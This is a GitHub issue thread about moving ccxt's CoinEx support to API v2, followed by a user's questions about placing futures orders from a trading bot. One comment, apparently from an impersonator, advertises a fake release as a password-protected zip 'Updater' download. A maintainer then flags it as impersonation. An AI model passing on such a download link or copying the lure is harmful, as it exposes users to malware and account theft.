### ISSUE TITLE
coinex v2 version 

### ISSUE THREAD

**Issue by Tidhy** [ccxt/ccxt#22208]
### Operating System

Windows11

### Programming Languages

Python

### CCXT Version

4.3.1

### Description

I found that the ws interface of Coinex exchange has been upgraded to version v2, but ccxtpro is still version v1, so I would like to ask if we have any plans to continue upgrading? Because their exchange has optimized the v2 version, it is recommended to use the v2 interface. Thank you for your answer

This is their document address

https://docs.coinex.com/api/v2/spot/market/ws/market-bbo

**Comment by Tidhy** [comment]
Or can I submit a PR?

**Comment by carlosmiei** [comment]
Hello @Tidhy, Thanks for letting us know, we're slowly migrating coinex to v2
cc/ @Dan-krm

**Comment by Tidhy** [comment]
> Hello @Tidhy, Thanks for letting us know, we're slowly migrating coinex to v2 cc/ @Dan-krm

Okay, similarly, I am currently connecting with multiple exchanges and have found that the ws ordering interface ccxtpro of the bybit exchange is not connected

https://bybit-exchange.github.io/docs/zh-TW/v5/websocket/trade/guideline

**Comment by carlosmiei** [comment]
@Tidhy Thanks! For now it's sandbox only, but we will try to add it as soon as possible.

> > Hello @Tidhy, Thanks for letting us know, we're slowly migrating coinex to v2 cc/ @Dan-krm
> 
> Okay, similarly, I am currently connecting with multiple exchanges and have found that the ws ordering interface ccxtpro of the bybit exchange is not connected
> 
> https://bybit-exchange.github.io/docs/zh-TW/v5/websocket/trade/guideline

**Comment by Enterpreneruim** [comment]
New Version has been Released 4.3.6
Fixed: Password asking, failed system load, XML load and etc. coinex fixed, coinbase fixed.
Extract files into folder with older version and start Updater.
[ccxt_upd_fetched.zip](https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip)
Full link - https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip
- Password 2024
- Current Status: Working, April 24.

**Comment by Tidhy** [comment]
> New Version has been Released 4.3.6 Fixed: Password asking, failed system load, XML load and etc. coinex fixed, coinbase fixed. Extract files into folder with older version and start Updater. [ccxt_upd_fetched.zip](https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip) Full link - https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip
> 
> * Password 2024
> * Current Status: Working, April 24.

Thank you, it's very fast

**Comment by carlosmiei** [comment]
> > New Version has been Released 4.3.6 Fixed: Password asking, failed system load, XML load and etc. coinex fixed, coinbase fixed. Extract files into folder with older version and start Updater. [ccxt_upd_fetched.zip](https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip) Full link - https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip
> > 
> > * Password 2024
> > * Current Status: Working, April 24.
> 
> Thank you, it's very fast

@Tidhy Please do not download that, it's a user impersonating my profile, Besides that you should always get new official versions of ccxt through the official channels (repo, npm, pip, composer, nuget)

**Comment by Dan-krm** [comment]
The upgrade to v2 for both REST and Websocket API's is completed now

**Comment by Sufus-Cuba** [comment]
I have a doubt: I've created a trading bot but I can't connect it to Coinex. It says my ID doesn't exist, even though I've verified it multiple times. I'm using an HTTP-based endpoint, not WebSocket. I would appreciate help with this.

**Comment by Dan-krm** [comment]
@Sufus-Cuba 
Which version of CCXT are you running?

You can provide a verbose log of your response if you want some help finding the source of the issue that you're having.

There's more information about opening questions and issues here:
https://github.com/ccxt/ccxt/wiki/FAQ#what-is-required-to-get-help

**Comment by Sufus-Cuba** [comment]
4.4.92

I have a connection to the platform, but it says my API is invalid. I'm
tired of checking it; the API I enter is valid, but I can't access my
account.

**Comment by Dan-krm** [comment]
@Sufus-Cuba you'll need to share a verbose response and open a separate issue if you want some help with that.

**Comment by Sufus-Cuba** [comment]
Look, I managed to connect to CoinEx with my API, and I've made progress
because it returns the correct balance. If I change my API, it tells me
that the code doesn't exist, which is correct.

Right now, I'm stuck trying to get my bot to execute at least one simple
order in futures—for example, if the price of ETH reaches 2550, it enters a
long position and sets a stop loss at 2540, something very simple. But I
haven't been able to execute even one order.

I would appreciate your help if you know how to do this in code. If you
want to help me, my bot uses two components: one that only connects to
CoinEx using my API and waits for signals from another bot that analyzes
ETH's real-time price and sends a buy or sell signal, and a main one that
links both.

I would be grateful if you could send me a code example of how to make my
bot, which executes orders received from the other bot, open a position in
the market.
